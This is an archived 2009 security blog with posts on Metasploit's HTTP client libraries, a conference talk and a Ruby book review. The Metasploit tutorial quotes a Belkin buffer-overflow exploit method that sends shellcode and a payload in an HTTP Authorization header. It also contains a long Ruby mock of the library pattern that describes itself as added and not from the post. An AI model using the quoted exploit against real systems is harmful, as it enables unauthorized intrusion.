Monday, June 8, 2009

carnal0wnage and Attack Research join forces!

I'm happy to announce that carnal0wnage and Attack Research have joined blog forces!

The new home for the blog will be:

http://carnal0wnage.attackresearch.com/

Please point your RSS readers to the new location and enjoy.

With the new blog comes the ability for a few more people to post. If you want to contribute, please email c0arblog@attackresearch.com

-CG


Monday, June 1, 2009

Making Life Easier With Metasploit Libraries

I was explaining some of this to a friend and figured I'd just post it...

If you have ever looked at an exploit module in Metasploit, most, if not all, will be calling additional libraries to actually "do" the work for the exploit; this is what makes MSF so great.

What I mean by that is, there is an exploit library (Msf at a higher level and Rex at a lower level) to set up and do most of the protocol work for us. So if we were going to write any sort of webserver exploit in Perl, we'd have to write all the code to do the HTTP connection ourselves (there may be a library for Perl too; bear with me). But with Metasploit we'd just call the HTTP library, which has the connect method in it.

http://trac.metasploit.com/browser/framework3/trunk/lib/msf/core/exploit/http.rb

Check line 70 for our connect method.

70 #
71 # Connects to an HTTP server.
72 #
73 def connect(opts={})
74   nclient = Rex::Proto::Http::Client.new(
75     rhost,
76     rport.to_i,
77     {
78       'Msf' => framework,
79       'MsfExploit' => self,
80     },
81     ssl,
82     proxies
83   )

We can also send raw HTTP requests:

171 #
172 # Connects to the server, creates a request, sends the request, reads the response
173 #
174 def send_request_raw(opts={}, timeout = -1)
175   begin
176     c = connect(opts)
177     r = c.request_raw(opts)
178     c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout)
179   rescue ::RuntimeError => e
180     print_error("An error occurred sending this request: #{e}")
181     nil
182   rescue ::Errno::EPIPE, ::Timeout::Error
183     nil
184   end
185 end

All the client and server methods are actually in http.rb. It's a good read.

So what's the point?

Well, if we start to take a look at the HTTP exploits, we'll see an include of:

include Msf::Exploit::Remote::HttpClient

This brings in all our HTTP client methods, like the ones above.

Then, when we want to send our actual request, we can do something simple like this, from:
http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/http/belkin_bulldog.rb

55 def exploit
56   c = connect
57
58   dwerd = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call dword [esp+58h]").encode_string
59
60   filler = [target.ret].pack('V') + dwerd + make_nops(28)
61
62   print_status("Trying target #{target.name}...")
63
64   send_request_raw({
65     'uri' => payload.encoded,
66     'version' => '1.1',
67     'method' => 'GET',
68     'headers' =>
69     {
70       'Authorization' => "Basic #{Rex::Text.encode_base64(filler)}"
71     }
72   }, 5)

On line 56 we initialize our connection with connect, and on lines 64-72 we send our request with our overflow and payload.

If we wanted to see all the options available to us in our send_request_raw request, we would check out the Rex::Proto::Http::Client (Rex = lower level) code at line 105.

http://trac.metasploit.com/browser/framework3/trunk/lib/rex/proto/http/client.rb
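To make the mixin pattern concrete, here is an added example (not Metasploit's own code and not from the post) that re-creates the structure in miniature: a stand-in for the lower-level Rex client that turns an opts hash into raw request bytes, a stand-in for the Msf HttpClient mixin that supplies connect and send_request_raw, and a module-shaped class that includes it. MiniRexClient, MiniHttpClient and ExampleHttpModule are all assumed names; the stand-in client records what it would have sent instead of opening a socket, so the example runs offline and you can inspect exactly what the 'headers' hash from the belkin_bulldog excerpt becomes on the wire.

```ruby
require 'timeout'

# Added example, not Metasploit code. MiniRexClient stands in for
# Rex::Proto::Http::Client (the lower-level library): it builds the raw
# request from an opts hash and records it instead of transmitting.
class MiniRexClient
  attr_reader :sent

  def initialize(host, port, ssl = false)
    @host = host
    @port = port
    @ssl  = ssl
    @sent = []
  end

  # Mirrors the shape of request_raw: uri, method, version and headers
  # all come from the same opts hash an exploit passes to send_request_raw.
  def request_raw(opts = {})
    method  = opts['method']  || 'GET'
    uri     = opts['uri']     || '/'
    version = opts['version'] || '1.1'
    headers = { 'Host' => "#{@host}:#{@port}" }.merge(opts['headers'] || {})

    lines = ["#{method} #{uri} HTTP/#{version}"]
    headers.each { |k, v| lines << "#{k}: #{v}" }
    req = lines.join("\r\n") + "\r\n\r\n"
    req += opts['data'].to_s if opts['data']
    req
  end

  # Records the request and returns a canned response so callers see the
  # same "request in, response out" flow as the real send_recv.
  def send_recv(req, _timeout)
    @sent << req
    "HTTP/1.1 200 OK\r\n\r\n"
  end
end

# Stand-in for Msf::Exploit::Remote::HttpClient: anything that includes
# this module gets connect and send_request_raw, which is what the
# `include` line in an HTTP exploit module brings in.
module MiniHttpClient
  # Builds the client from the module's rhost/rport/ssl values (assumption:
  # the client is cached here so the recorded requests can be inspected).
  def connect(_opts = {})
    @client ||= MiniRexClient.new(rhost, rport.to_i, ssl)
  end

  # Same flow as the excerpt: connect, build the request, send and receive.
  def send_request_raw(opts = {}, timeout = -1)
    c = connect(opts)
    r = c.request_raw(opts)
    c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout)
  rescue ::Errno::EPIPE, ::Timeout::Error
    nil
  end
end

# A module-shaped class: target values plus an exploit method that uses
# only what the mixin provides, the same structure as the post's excerpt.
class ExampleHttpModule
  include MiniHttpClient

  attr_reader :rhost, :rport, :ssl

  def initialize(rhost, rport, ssl = false)
    @rhost = rhost
    @rport = rport
    @ssl   = ssl
  end

  # Sends a benign GET carrying a constructed Basic Authorization header,
  # to show where the 'headers' hash ends up in the raw request.
  def exploit
    connect
    send_request_raw({
      'uri'     => '/example',
      'version' => '1.1',
      'method'  => 'GET',
      'headers' => { 'Authorization' => "Basic #{['user:pass'].pack('m0')}" }
    }, 5)
  end

  # The raw bytes the stand-in client last "sent".
  def last_request
    @client.sent.last
  end
end

if __FILE__ == $0
  m = ExampleHttpModule.new('192.0.2.10', 8080)   # constructed, documentation-range address
  puts m.exploit
  puts m.last_request
end
```

Running the file prints the canned response followed by the recorded request: the request line, a Host header added by the stand-in client, and the Authorization header from the opts hash, each CRLF-terminated and followed by the blank line that ends the headers. Swapping the stand-in for the real Rex client is the only change between this and a module that actually connects, which is the point of the mixin design.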

More on this later; hopefully this is enough to get you started looking under the hood of the framework.

-CG


Wednesday, May 20, 2009

Carnal0wnage will be at BruCon!

I'm happy to announce that I'll be speaking at Brucon in September (18-19) on Open Source Information Gathering.

This is an update to my set of talks from last year. After a year of doing OSINT work I've revised the methodology, and it should be a pretty good update to the previous talk. I'm planning on focusing a lot on Person/Organization Information Gathering (IG), and my talk should be followed by Chris Nickerson talking about Red and Tiger Team Testing (I call it Full Scope testing), aka putting all the "stuff" we found in my talk to actual use.

Should be a good time. Plus Hoegaarden on tap!

Check the Brucon blog for up to date info:
http://blog.brucon.org/


Client-Side Penetration Testing Notacon Edition

Here's the video from the Notacon talk. Audio sucks, sorry...blame the video guy.

Full Scope Security Attacking Layer 8: Client-Side Penetration Testing Notacon '09 Edition from FullScopeSecurity on Vimeo.


Not Dead, just busy

I'm not dead and I haven't quit blogging, just been tired and busy and working on a fairly big change to c0 that I think everyone will enjoy. I was hoping it was going to be ready by now but it's not... I do this for free... so you'll just have to wait :-) I'm actually waiting on someone else to do something, and they also do what I'm waiting on for free... vicious cycle...

Back to your regularly scheduled ranting and pwning.


Tuesday, May 19, 2009

2 Year Anniversary!

Happy Two Year Anniversary of carnal0wnage blog!


Monday, May 4, 2009

Wicked Cool Ruby Scripts Book Review


By Steve Pugh

4 stars

Thanks to No Starch Press for my review copy!

From the Description

Wicked Cool Ruby Scripts provides 58 scripts that offer quick solutions to problems like system administration, manipulating images, and managing a website. After getting your feet wet creating simple scripts to automate tasks like file compression and decompression, you'll learn how to create powerful web crawlers, security scripts, and full-fledged libraries and applications, as well as how to:

* Rename files, disable processes, change permissions, and modify users
* Manipulate strings, encrypt files, and sort efficiently
* Validate web links, check for orphan files, and generate forms
* Mass edit photos, extract image information, and create thumbnails
* Parse CSV files and scrape links, images, and pages from the Web


Ruby is a highly extensible and sometimes confusing language, especially when you throw in all the various rubygems out there. Wicked Cool Ruby Scripts provides many examples of how to use the various gems to script together quick hacks (wicked scripts) for various problems one may encounter.

Steve walks us through the problem we are trying to solve, the code to solve the problem, how to run the code, what the results look like, a lengthy discussion of how it works, and "hacking the script" with ideas on how to extend what we wrote. All the code is well commented (see the sample chapter on No Starch Press) and well explained.

Pros:
Easy and fun to read, the font is readable, it doesn't contain pages and pages of uncommented code, source code is available, a companion website exists, and the book left me with memorable ways to remember and use the material. I've actually gone back a few times to look at some of the scripts in the book. I also liked the Metasploit section (of course). It certainly isn't your typical "Hello World" programming book, which is also refreshing.

Cons:
As one other person posted in their Amazon review, it's a bit hard to say what level the book is for. It's certainly NOT for beginners, as we're expected to already have Ruby up and running and understand the basics, and it's not advanced material either. That leaves us with intermediate, which is ok but certainly makes it hard to recommend for knowledgeable programmers. The book is short; it's got 58 or so scripts coming in at 170 pages, but it would have been nice to have more. It's certainly not "too short", but more would have been nice. I would have liked to have had more information on the specific rubygems used for different scripts. Links to the specific gem homepages for further usage would have been nice as well.

View the detailed Table of Contents (PDF)

View the Index (PDF)

Sample Chapter: Chapter 1: "General Purpose Utilities"

Source Code: Source Code from the Book



